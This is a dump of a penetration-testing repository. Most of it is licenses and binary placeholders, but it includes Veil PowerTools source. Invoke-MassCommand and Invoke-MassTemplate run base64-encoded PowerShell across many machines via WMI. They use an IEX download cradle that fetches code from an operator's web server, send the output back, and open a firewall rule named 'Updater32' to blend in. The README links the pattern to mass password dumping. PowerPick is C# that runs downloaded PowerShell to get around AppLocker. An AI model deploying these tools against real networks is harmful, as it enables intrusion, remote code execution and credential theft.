292 | 293 | 294 | Copyright (C) 295 | 296 | This program is free software; you can redistribute it and/or modify 297 | it under the terms of the GNU General Public License as published by 298 | the Free Software Foundation; either version 2 of the License, or 299 | (at your option) any later version. 300 | 301 | This program is distributed in the hope that it will be useful, 302 | but WITHOUT ANY WARRANTY; without even the implied warranty of 303 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 304 | GNU General Public License for more details. 305 | 306 | You should have received a copy of the GNU General Public License 307 | along with this program; if not, write to the Free Software 308 | Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA 309 | 310 | 311 | Also add information on how to contact you by electronic and paper mail. 312 | 313 | If the program is interactive, make it output a short notice like this 314 | when it starts in an interactive mode: 315 | 316 | Gnomovision version 69, Copyright (C) year name of author 317 | Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'. 318 | This is free software, and you are welcome to redistribute it 319 | under certain conditions; type `show c' for details. 320 | 321 | The hypothetical commands `show w' and `show c' should show the appropriate 322 | parts of the General Public License. Of course, the commands you use may 323 | be called something other than `show w' and `show c'; they could even be 324 | mouse-clicks or menu items--whatever suits your program. 325 | 326 | You should also get your employer (if you work as a programmer) or your 327 | school, if any, to sign a "copyright disclaimer" for the program, if 328 | necessary. Here is a sample; alter the names: 329 | 330 | Yoyodyne, Inc., hereby disclaims all copyright interest in the program 331 | `Gnomovision' (which makes passes at compilers) written by James Hacker. 
332 | 333 | , 1 April 1989 334 | Ty Coon, President of Vice 335 | 336 | This General Public License does not permit incorporating your program into 337 | proprietary programs. If your program is a subroutine library, you may 338 | consider it more useful to permit linking proprietary applications with the 339 | library. If this is what you want to do, use the GNU Lesser General 340 | Public License instead of this License. 341 | -------------------------------------------------------------------------------- /net/Windows/HeidiSQL_9.1_Portable/heidisql.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/HeidiSQL_9.1_Portable/heidisql.exe -------------------------------------------------------------------------------- /net/Windows/HeidiSQL_9.1_Portable/libeay32.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/HeidiSQL_9.1_Portable/libeay32.dll -------------------------------------------------------------------------------- /net/Windows/HeidiSQL_9.1_Portable/libintl.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/HeidiSQL_9.1_Portable/libintl.dll -------------------------------------------------------------------------------- /net/Windows/HeidiSQL_9.1_Portable/libmysql.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/HeidiSQL_9.1_Portable/libmysql.dll -------------------------------------------------------------------------------- 
/net/Windows/HeidiSQL_9.1_Portable/libpq.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/HeidiSQL_9.1_Portable/libpq.dll

--------------------------------------------------------------------------------
/net/Windows/HeidiSQL_9.1_Portable/license.txt:
--------------------------------------------------------------------------------
Copyright (C)2000 - 2014 - Ansgar Becker

HeidiSQL is free. You don't have to pay for it, and you can use it any way you want. It is developed as an Open Source project under the GNU General Public License (GPL). That means you have full access to the source code of this program. You can find it at GoogleCode here:
http://code.google.com/p/heidisql/source/checkout

The General Public License (GPL) is shipped with the installer-package and should be located in the same folder as this file (gpl.txt).

If you simply wish to install and use this software, you need only be aware of the disclaimer conditions in the license, which are set out below.

NO WARRANTY

Because the program is licensed free of charge, there is no warranty for the program, to the extent permitted by applicable law. Except when otherwise stated in writing the copyright holders and/or other parties provide the program "as is" without warranty of any kind, either expressed or implied, including, but not limited to, the implied warranties of merchantability and fitness for a particular purpose. The entire risk as to the quality and performance of the program is with you. Should the program prove defective, you assume the cost of all necessary servicing, repair or correction.

In no event unless required by applicable law or agreed to in writing will any copyright holder, or any other party who may modify and/or redistribute the program as permitted above, be liable to you for damages, including any general, special, incidental or consequential damages arising out of the use or inability to use the program (including but not limited to loss of data or data being rendered inaccurate or losses sustained by you or third parties or a failure of the program to operate with any other programs), even if such holder or other party has been advised of the possibility of such damages.

--------------------------------------------------------------------------------
/net/Windows/HeidiSQL_9.1_Portable/plugins/dialog.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/HeidiSQL_9.1_Portable/plugins/dialog.dll

--------------------------------------------------------------------------------
/net/Windows/HeidiSQL_9.1_Portable/portable_settings.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/HeidiSQL_9.1_Portable/portable_settings.txt

--------------------------------------------------------------------------------
/net/Windows/HeidiSQL_9.1_Portable/ssleay32.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/HeidiSQL_9.1_Portable/ssleay32.dll

--------------------------------------------------------------------------------
/net/Windows/ImmunityDebugger_1_85_setup.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/ImmunityDebugger_1_85_setup.exe

--------------------------------------------------------------------------------
/net/Windows/PS2EXE-v0.5.0.0/MS-PL.txt:
--------------------------------------------------------------------------------
Microsoft Public License (Ms-PL)
from http://www.microsoft.com/opensource/licenses.mspx#Ms-PL

This license governs use of the accompanying software. If you use the software, you accept this license. If you do not accept the license, do not use the software.

1. Definitions

The terms "reproduce," "reproduction," "derivative works," and "distribution" have the same meaning here as under U.S. copyright law. A "contribution" is the original software, or any additions or changes to the software. A "contributor" is any person that distributes its contribution under this license. "Licensed patents" are a contributor's patent claims that read directly on its contribution.

2. Grant of Rights

(A) Copyright Grant- Subject to the terms of this license, including the license conditions and limitations in section 3, each contributor grants you a non-exclusive, worldwide, royalty-free copyright license to reproduce its contribution, prepare derivative works of its contribution, and distribute its contribution or any derivative works that you create.
(B) Patent Grant- Subject to the terms of this license, including the license conditions and limitations in section 3, each contributor grants you a non-exclusive, worldwide, royalty-free license under its licensed patents to make, have made, use, sell, offer for sale, import, and/or otherwise dispose of its contribution in the software or derivative works of the contribution in the software.

3. Conditions and Limitations

(A) No Trademark License- This license does not grant you rights to use any contributors' name, logo, or trademarks.
(B) If you bring a patent claim against any contributor over patents that you claim are infringed by the software, your patent license from such contributor to the software ends automatically.
(C) If you distribute any portion of the software, you must retain all copyright, patent, trademark, and attribution notices that are present in the software.
(D) If you distribute any portion of the software in source code form, you may do so only under this license by including a complete copy of this license with your distribution. If you distribute any portion of the software in compiled or object code form, you may only do so under a license that complies with this license.
(E) The software is licensed "as-is." You bear the risk of using it. The contributors give no express warranties, guarantees, or conditions. You may have additional consumer rights under your local laws which this license cannot change. To the extent permitted under your local laws, the contributors exclude the implied warranties of merchantability, fitness for a particular purpose and non-infringement.
--------------------------------------------------------------------------------
/net/Windows/PS2EXE-v0.5.0.0/PSEXE.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/PS2EXE-v0.5.0.0/PSEXE.ico

--------------------------------------------------------------------------------
/net/Windows/PS2EXE-v0.5.0.0/callPS2EXE.bat:
--------------------------------------------------------------------------------
@ECHO OFF
set cmd=
:Loop
IF "%~1"=="" GOTO Continue

set cmd=%cmd% '%1'

SHIFT
GOTO Loop
:Continue

rem echo %cmd%
powershell.exe -command "&'.\ps2exe.ps1' %cmd%"

--------------------------------------------------------------------------------
/net/Windows/PS2EXE-v0.5.0.0/createDemo.bat:
--------------------------------------------------------------------------------
call "callPS2EXE.bat" "test.ps1" "test.exe" -iconFile PS2EXE.ico

call "callPS2EXE.bat" "test.ps1" "test_x64.exe" -x64

call "callPS2EXE.bat" "test.ps1" "test_x86.exe" -x86

call "callPS2EXE.bat" "test.ps1" "test_20_STA.exe" -sta -runtime20 -iconFile PS2EXE.ico

call "callPS2EXE.bat" "test.ps1" "test_30_MTA.exe" -mta -runtime30

call "callPS2EXE.bat" "test.ps1" "test_30_NOCONSOLE.exe" -noconsole -runtime30

call "callPS2EXE.bat" "test.ps1" "test_20_NOCONSOLE.exe" -noconsole -runtime20

call "callPS2EXE.bat" "test.ps1" "test_40.exe" -runtime40

--------------------------------------------------------------------------------
/net/Windows/PS2EXE-v0.5.0.0/ps2exe.ps1:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/PS2EXE-v0.5.0.0/ps2exe.ps1
--------------------------------------------------------------------------------
/net/Windows/PS2EXE-v0.5.0.0/test.ps1:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/PS2EXE-v0.5.0.0/test.ps1

--------------------------------------------------------------------------------
/net/Windows/PowerTools-master/LICENSE:
--------------------------------------------------------------------------------
PowerTools is provided under the 3-clause BSD license below.

*************************************************************

Copyright (c) 2014, Will Schroeder
All rights reserved.

Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:

Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
The names of its contributors may not be used to endorse or promote products derived from this software without specific prior written permission.

THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

--------------------------------------------------------------------------------
/net/Windows/PowerTools-master/PewPewPew/Invoke-MassCommand.ps1:
--------------------------------------------------------------------------------
<#
Template to mass-run a specific command across
multiple machines using WMI and retrieve the results
using a local web server.

by @harmj0y
#>


function Invoke-MassCommand {
    <#
    .SYNOPSIS
    Uses WMI and a local web server to mass-run a command
    across multiple machines.

    .PARAMETER Hosts
    Array of host names to run Invoke-MassCommand on.

    .PARAMETER HostList
    List of host names to run Invoke-MassCommand on.

    .PARAMETER Command
    PowerShell one-liner command to run.

    .PARAMETER LocalIpAddress
    Local IP address to use. Will try to determine if not specified.

    .PARAMETER LocalPort
    Local port to host the script on, defaults to 8080

    .PARAMETER ServerSleep
    Time to sleep the web server for output before shutting it down.
    Default to 30 seconds.

    .PARAMETER OutputFolder
    Folder to pipe host outputs to.

    .PARAMETER FireWallRule
    Add (and then remove) a firewall rule to allow access to the
    specified port.
    #>
    [cmdletbinding()]
    param(
        [Parameter(Position=0,ValueFromPipeline=$true)]
        [String[]]
        $Hosts,

        [String]
        $HostList,

        [String]
        $Command = "dir C:\",

        [String]
        $LocalIpAddress,

        [String]
        $LocalPort="8080",

        [Int]
        $ServerSleep=30,

        [String]
        $OutputFolder="CommandOutput",

        [Switch]
        $FireWallRule
    )

    begin {

        # script block to invoke over remote machines.
        $WebserverScriptblock={
            param($LocalPort, $OutputFolder)

            # webserver stub adapted from @obscuresec:
            # https://gist.github.com/obscuresec/71df69d828e6e05986e9#file-dirtywebserver-ps1
            $Hso = New-Object Net.HttpListener
            $Hso.Prefixes.Add("http://+:$LocalPort/")
            $Hso.Start()

            while ($Hso.IsListening) {
                $HC = $Hso.GetContext()
                $OriginatingIP = $HC.Request.UserHostAddress
                $HRes = $HC.Response
                $HRes.Headers.Add("Content-Type","text/plain")
                $Buf = [Text.Encoding]::UTF8.GetBytes("")

                # process any GET requests
                if( $HC.Request.RawUrl -eq "/"){
                    $Buf = [Text.Encoding]::UTF8.GetBytes("")
                }
                # process any POST results from the invoked script
                else {
                    # extract the hostname from the URI request
                    $hostname = $HC.Request.RawUrl.split("/")[-1]

                    $output = ""
                    $size = $HC.Request.ContentLength64 + 1

                    $buffer = New-Object byte[] $size
                    do {
                        $count = $HC.Request.InputStream.Read($buffer, 0, $size)
                        $output += $HC.Request.ContentEncoding.GetString($buffer, 0, $count)
                    } until($count -lt $size)
                    $HC.Request.InputStream.Close()

                    if (($output) -and ($output.Length -ne 0)){
                        $decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($output))

                        $OutFile = $OutputFolder + "\$($hostname).txt"

                        $decoded | Out-File -Append -Encoding ASCII -FilePath $OutFile
                    }
                }

                $HRes.ContentLength64 = $Buf.Length
                $HRes.OutputStream.Write($Buf,0,$Buf.Length)
                $HRes.Close()
            }
        }

        if($HostList){
            if (Test-Path -Path $HostList){
                $Hosts += Get-Content -Path $HostList
            }
            else {
                Write-Warning "[!] Input file '$HostList' doesn't exist!"
            }
        }

        # if the output file isn't a full path, append the current location to it
        if(-not ($OutputFolder.Contains("\"))){
            $OutputFolder = (Get-Location).Path + "\" + $OutputFolder
        }

        # create the output folder if it doesn't exist
        New-Item -Force -ItemType directory -Path $OutputFolder | Out-Null

        # add a temporary firewall rule if specified
        if($FireWallRule){
            Write-Verbose "Setting inbound firewall rule for port $LocalPort"
            $fw = New-Object -ComObject hnetcfg.fwpolicy2
            $rule = New-Object -ComObject HNetCfg.FWRule
            $rule.Name = "Updater32"
            $rule.Protocol = 6
            $rule.LocalPorts = $LocalPort
            $rule.Direction = 1
            $rule.Enabled=$true
            $rule.Grouping="@firewallapi.dll,-23255"
            $rule.Profiles = 7
            $rule.Action=1
            $rule.EdgeTraversal=$false
            $fw.Rules.Add($rule)
        }

        Start-Job -Name WebServer -Scriptblock $WebserverScriptblock -ArgumentList $LocalPort,$OutputFolder | Out-Null
        Write-Verbose "Sleeping, letting the web server stand up..."
        Start-Sleep -s 5
    }

    process {

        if(-not $LocalIpAddress){
            $LocalIpAddress = (gwmi Win32_NetworkAdapterConfiguration | ? { $_.IPAddress -ne $null}).ipaddress[0]
        }

        $hosts | % {
            # the download/check back in command
            $LauncherCommand = "$Command | % {[System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes(`$_))} | % {(new-object net.webclient).UploadString('http://"+$LocalIpAddress+":$LocalPort/$_', `$_)}"
            $bytes = [Text.Encoding]::Unicode.GetBytes($LauncherCommand)
            $encodedCommand = [Convert]::ToBase64String($bytes)

            Write-Verbose "Executing command on host `"$_`""
            Invoke-WmiMethod -ComputerName $_ -Path Win32_process -Name create -ArgumentList "powershell.exe -enc $encodedCommand" | out-null
        }
    }

    end {

        Write-Verbose "Waiting $ServerSleep seconds for commands to trigger..."
        Start-Sleep -s $ServerSleep

        # perform any post-processing on the output files...
        Get-ChildItem $OutputFolder -Filter *.txt |
        foreach-object {
            $server = $_.Name.split(".")[0]
            $rawtext = [Io.File]::ReadAllText($_.FullName)
            # ...
        }

        # remove the firewall rule if specified
        if($FireWallRule){
            Write-Verbose "Removing inbound firewall rule"
            $fw.rules.Remove("Updater32")
        }

        Write-Verbose "Killing the web server"
        Get-Job -Name WebServer | Stop-Job
    }
}

--------------------------------------------------------------------------------
/net/Windows/PowerTools-master/PewPewPew/Invoke-MassTemplate.ps1:
--------------------------------------------------------------------------------
<#
Template to mass-run a specific powershell script
across multiple machines using a local web server
and WMI execution.

Replace "" with the script you
want run.

by @harmj0y
#>


function Invoke-MassTemplate {
    <#
    .SYNOPSIS
    ...

    .PARAMETER Hosts
    Array of host names to run Invoke-X on.

    .PARAMETER HostList
    List of host names to run Invoke-X on.

    .PARAMETER LocalIpAddress
    Local IP address to use. Will try to determine if not specified.

    .PARAMETER LocalPort
    Local port to host the script on, defaults to 8080

    .PARAMETER ServerSleep
    Time to sleep the web server for output before shutting it down.
    Default to 30 seconds.

    .PARAMETER OutputFolder
    Folder to pipe host outputs to.

    .PARAMETER FireWallRule
    Add (and then remove) a firewall rule to allow access to the
    specified port.
    #>
    [cmdletbinding()]
    param(
        [Parameter(Position=0,ValueFromPipeline=$true)]
        [String[]]
        $Hosts,

        [String]
        $HostList,

        [String]
        $LocalIpAddress,

        [String]
        $LocalPort="8080",

        [Int]
        $ServerSleep=30,

        [String]
        $OutputFolder="output",

        [Switch]
        $FireWallRule
    )


    begin {

        # script block to invoke over remote machines.
70 | $WebserverScriptblock={ 71 | param($LocalPort, $OutputFolder) 72 | 73 | $HostedScript = 74 | @' 75 | 76 | 77 | 78 | '@ 79 | 80 | # webserver stub adapted from @obscuresec: 81 | # https://gist.github.com/obscuresec/71df69d828e6e05986e9#file-dirtywebserver-ps1 82 | $Hso = New-Object Net.HttpListener 83 | $Hso.Prefixes.Add("http://+:$LocalPort/") 84 | $Hso.Start() 85 | 86 | while ($Hso.IsListening) { 87 | $HC = $Hso.GetContext() 88 | $OriginatingIP = $HC.Request.UserHostAddress 89 | $HRes = $HC.Response 90 | $HRes.Headers.Add("Content-Type","text/plain") 91 | $Buf = [Text.Encoding]::UTF8.GetBytes("") 92 | 93 | # process any GET requests 94 | if( $HC.Request.RawUrl -eq "/update"){ 95 | $Buf = [Text.Encoding]::UTF8.GetBytes($HostedScript) 96 | } 97 | elseif( $HC.Request.RawUrl -eq "/"){ 98 | $Buf = [Text.Encoding]::UTF8.GetBytes("") 99 | } 100 | # process any POST results from the invoked script 101 | else { 102 | # extract the hostname from the URI request 103 | $hostname = $HC.Request.RawUrl.split("/")[-1] 104 | 105 | $output = "" 106 | $size = $HC.Request.ContentLength64 + 1 107 | 108 | $buffer = New-Object byte[] $size 109 | do { 110 | $count = $HC.Request.InputStream.Read($buffer, 0, $size) 111 | $output += $HC.Request.ContentEncoding.GetString($buffer, 0, $count) 112 | } until($count -lt $size) 113 | $HC.Request.InputStream.Close() 114 | 115 | if (($output) -and ($output.Length -ne 0)){ 116 | $decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($output)) 117 | 118 | $OutFile = $OutputFolder + "\$($hostname).txt" 119 | 120 | $decoded | Out-File -Append -Encoding ASCII -FilePath $OutFile 121 | } 122 | } 123 | $HRes.ContentLength64 = $Buf.Length 124 | $HRes.OutputStream.Write($Buf,0,$Buf.Length) 125 | $HRes.Close() 126 | } 127 | } 128 | 129 | if($HostList){ 130 | if (Test-Path -Path $HostList){ 131 | $Hosts += Get-Content -Path $HostList 132 | } 133 | else { 134 | Write-Warning "[!] Input file '$HostList' doesn't exist!" 
135 | } 136 | } 137 | 138 | # if the output file isn't a full path, append the current location to it 139 | if(-not ($OutputFolder.Contains("\"))){ 140 | $OutputFolder = (Get-Location).Path + "\" + $OutputFolder 141 | } 142 | 143 | # create the output folder if it doesn't exist 144 | New-Item -Force -ItemType directory -Path $OutputFolder | Out-Null 145 | 146 | # add a temporary firewall rule if specified 147 | if($FireWallRule){ 148 | Write-Verbose "Setting inbound firewall rule for port $LocalPort" 149 | $fw = New-Object -ComObject hnetcfg.fwpolicy2 150 | $rule = New-Object -ComObject HNetCfg.FWRule 151 | $rule.Name = "Updater32" 152 | $rule.Protocol = 6 153 | $rule.LocalPorts = $LocalPort 154 | $rule.Direction = 1 155 | $rule.Enabled=$true 156 | $rule.Grouping="@firewallapi.dll,-23255" 157 | $rule.Profiles = 7 158 | $rule.Action=1 159 | $rule.EdgeTraversal=$false 160 | $fw.Rules.Add($rule) 161 | } 162 | 163 | Start-Job -Name WebServer -Scriptblock $WebserverScriptblock -ArgumentList $LocalPort,$OutputFolder | Out-Null 164 | Write-Verbose "Sleeping, letting the web server stand up..." 
165 | Start-Sleep -s 5 166 | } 167 | 168 | process { 169 | 170 | if(-not $LocalIpAddress){ 171 | $p = (gwmi Win32_NetworkAdapterConfiguration| Where{$_.IPAddress} | Select -Expand IPAddress); 172 | # check if the IP is a string or the [IPv4,IPv6] array 173 | $LocalIpAddress = @{$true=$p[0];$false=$p}[$p.Length -lt 6]; 174 | } 175 | 176 | $hosts | % { 177 | # the download/check back in command 178 | $command = "IEX (New-Object Net.Webclient).DownloadString('http://"+$LocalIpAddress+":$LocalPort/update') | % {[System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes(`$_))} | % {(new-object net.webclient).UploadString('http://"+$LocalIpAddress+":$LocalPort/$_', `$_)}" 179 | $bytes = [Text.Encoding]::Unicode.GetBytes($command) 180 | $encodedCommand = [Convert]::ToBase64String($bytes) 181 | 182 | Write-Verbose "Executing command on host `"$_`"" 183 | Invoke-WmiMethod -ComputerName $_ -Path Win32_process -Name create -ArgumentList "powershell.exe -enc $encodedCommand" | out-null 184 | } 185 | } 186 | 187 | end { 188 | 189 | Write-Verbose "Waiting $ServerSleep seconds for commands to trigger..." 190 | Start-Sleep -s $ServerSleep 191 | 192 | # perform any post-processing on the output files... 193 | Get-ChildItem $OutputFolder -Filter *.txt | 194 | foreach-object { 195 | $server = $_.Name.split(".")[0] 196 | $rawtext = [Io.File]::ReadAllText($_.FullName) 197 | # ... 
198 | } 199 | 200 | # remove the firewall rule if specified 201 | if($FireWallRule){ 202 | Write-Verbose "Removing inbound firewall rule" 203 | $fw.rules.Remove("Updater32") 204 | } 205 | 206 | Write-Verbose "Killing the web server" 207 | Get-Job -Name WebServer | Stop-Job 208 | } 209 | } 210 | -------------------------------------------------------------------------------- /net/Windows/PowerTools-master/PewPewPew/README.md: -------------------------------------------------------------------------------- 1 | #PewPewPew 2 | 3 | This repo contains scripts that utilize a common pattern to host a script 4 | on a PowerShell webserver, invoke the IEX download cradle to 5 | download/execute the target code and post the results back to the server, 6 | and then post-process any results. 7 | 8 | More details [here](http://www.harmj0y.net/blog/powershell/dumping-a-domains-worth-of-passwords-with-mimikatz-pt-2/) 9 | 10 | Developed by [@harmj0y](https://twitter.com/harmj0y) 11 | 12 | Part of Veil's [PowerTools](https://github.com/Veil-Framework/PowerTools) 13 | -------------------------------------------------------------------------------- /net/Windows/PowerTools-master/PowerPick/PowerPick.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 11.00 3 | # Visual C# Express 2010 4 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "PowerPick", "PowerPick\PowerPick.csproj", "{5ED2F78E-8538-4C87-BCED-E19E9DAD879C}" 5 | EndProject 6 | Global 7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 8 | Debug|x86 = Debug|x86 9 | Release|x86 = Release|x86 10 | EndGlobalSection 11 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 12 | {5ED2F78E-8538-4C87-BCED-E19E9DAD879C}.Debug|x86.ActiveCfg = Debug|x86 13 | {5ED2F78E-8538-4C87-BCED-E19E9DAD879C}.Debug|x86.Build.0 = Debug|x86 14 | {5ED2F78E-8538-4C87-BCED-E19E9DAD879C}.Release|x86.ActiveCfg = Release|x86 15 | 
        {5ED2F78E-8538-4C87-BCED-E19E9DAD879C}.Release|x86.Build.0 = Release|x86
    EndGlobalSection
    GlobalSection(SolutionProperties) = preSolution
        HideSolutionNode = FALSE
    EndGlobalSection
EndGlobal

--------------------------------------------------------------------------------
/net/Windows/PowerTools-master/PowerPick/PowerPick/PowerPick.csproj:
--------------------------------------------------------------------------------
(XML element tags were stripped by extraction; only element values survive. Recoverable facts: a Visual C# 2010 project, ProjectGuid {5ED2F78E-8538-4C87-BCED-E19E9DAD879C}, OutputType Exe, RootNamespace and AssemblyName PowerPick, TargetFrameworkVersion v4.0 with the Client profile, Debug|x86 (full PDB, DEBUG;TRACE) and Release|x86 (pdbonly, TRACE) configurations, a ClickOnce publish path of publish\ with prerequisites .NET Framework 4 Client Profile (x86 and x64), .NET Framework 3.5 SP1 Client Profile, .NET Framework 3.5 SP1 and Windows Installer 3.1, a Resources.resx / Resources.Designer.cs pair generated by ResXFileCodeGenerator, and a non-SpecificVersion reference to System.Management.Automation.dll resolved via the relative path ..\..\..\..\..\..\..\Program Files\Reference Assemblies\Microsoft\WindowsPowerShell\v1.0\System.Management.Automation.dll.)

--------------------------------------------------------------------------------
/net/Windows/PowerTools-master/PowerPick/PowerPick/PowerPick.csproj.user:
--------------------------------------------------------------------------------
(XML element tags were stripped by extraction. Recoverable facts: publish path publish\, culture en-US, and the debugger start arguments `-f c:\users\sixdub\desktop\test.ps1` for both the Debug and Release configurations.)

--------------------------------------------------------------------------------
/net/Windows/PowerTools-master/PowerPick/PowerPick/Program.cs:
--------------------------------------------------------------------------------
```csharp
/*
 * PowerPick aka InexorablePoSH
 * Description: Application to load and run powershell code via the .NET assemblies
 * License: 3-Clause BSD License. See Veil PowerTools Project
 *
 * This application is part of Veil PowerTools, a collection of offensive PowerShell
 * capabilities. Hope they help!
 */

using System;
using System.IO;
using System.Resources;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Net;

//Adding libraries for powershell stuff
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;


namespace PowerPick
{
    class Program
    {
        // Run a script string inside an in-process runspace and return its Out-String output.
        static string RunPS(string cmd)
        {
            //Init stuff
            Runspace runspace = RunspaceFactory.CreateRunspace();
            runspace.Open();
            RunspaceInvoke scriptInvoker = new RunspaceInvoke(runspace);
            Pipeline pipeline = runspace.CreatePipeline();

            //Add commands
            pipeline.Commands.AddScript(cmd);

            //Prep PS for string output and invoke
            pipeline.Commands.Add("Out-String");
            // (generic type argument <PSObject> restored; the extraction dropped it)
            Collection<PSObject> results = pipeline.Invoke();
            runspace.Close();

            //Convert records to strings
            StringBuilder stringBuilder = new StringBuilder();
            foreach (PSObject obj in results)
            {
                stringBuilder.Append(obj);
            }
            return stringBuilder.ToString().Trim();
        }

        static void PrintHelp()
        {
            Console.Write("InexorablePoSH\n" +
                "Workaround for AppLocker deny of Powershell using .NET\n" +
                "\n" +
                "inexorableposh.exe [ ]\n" +
                "flags:\n" +
                "-f : Read script from specified file\n" +
                "-r : Read script from specified resource\n" +
                "-d : Read script from URL\n" +
                "-a : Read script appended to current binary after specified delimiter. Delimiter should be very very unique string\n" +
                "-c : PowerShell command to execute, enclosed in quotes.");
        }

        static int Main(string[] args)
        {
            string script;

            //Check the options
            if (args.Length != 2)
            {
                Console.WriteLine("[!] Error: Proper arguments required");
                PrintHelp();
                return -1;
            }

            //define our flag and argument
            string flag = args[0];
            string optarg = args[1];

            //Check all our options for the flag
            //When found right flag, get the script variable in the specified manner
            if (flag == "-f")
            {
                //read file from disk and pass to powershell
                try
                {
                    script = System.IO.File.ReadAllText(optarg);
                }
                catch
                {
                    Console.WriteLine("[!] Error: File Fail");
                    return (-1);
                }
            }
            else if (flag == "-r")
            {
                //Read powershell from resource of a specific name
                try
                {
                    script = Properties.Resources.ResourceManager.GetString(optarg);
                }
                catch
                {
                    Console.WriteLine("[!] Error: Resource Fail");
                    return (-1);
                }
            }
            else if (flag == "-d")
            {
                //download the script
                try
                {
                    WebClient psdown = new WebClient();
                    script = psdown.DownloadString(optarg);
                }
                catch
                {
                    Console.WriteLine("[!] Error: Download Fail");
                    return (-1);
                }
            }
            else if (flag == "-a")
            {
                //read our own image from disk and take whatever follows the delimiter
                try
                {
                    string self = System.Diagnostics.Process.GetCurrentProcess().MainModule.FileName;
                    string selfcontent = System.IO.File.ReadAllText(self);
                    script = selfcontent.Split(new string[] { optarg }, StringSplitOptions.None)[1];
                }
                catch
                {
                    Console.WriteLine("[!] Error: Append Read fail");
                    return (-1);
                }
            }
            else if (flag == "-c")
            {
                try
                {
                    script = optarg;
                }
                catch
                {
                    Console.WriteLine("[!] Error: Command fail");
                    return (-1);
                }
            }
            else
            {
                Console.WriteLine("[!] Error: Improper flag");
                PrintHelp();
                return (-1);
            }

            //We should now have the script variable filled... double check before executing
            if (script != null)
            {
                string results = RunPS(script);
                Console.Write(results);
            }
            return 0;

        }
    }
}
```
--------------------------------------------------------------------------------
/net/Windows/PowerTools-master/PowerPick/PowerPick/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
```csharp
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;

// General Information about an assembly is controlled through the following
// set of attributes. Change these attribute values to modify the information
// associated with an assembly.
[assembly: AssemblyTitle("PowerPick")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("PowerPick")]
[assembly: AssemblyCopyright("Copyright © 2014")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]

// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]

// The following GUID is for the ID of the typelib if this project is exposed to COM
[assembly: Guid("ee46098e-3711-4c27-a61a-9b51cf637346")]

// Version information for an assembly consists of the following four values:
//
//      Major Version
//      Minor Version
//      Build Number
//      Revision
//
// You can specify all the values or you can default the Build and Revision Numbers
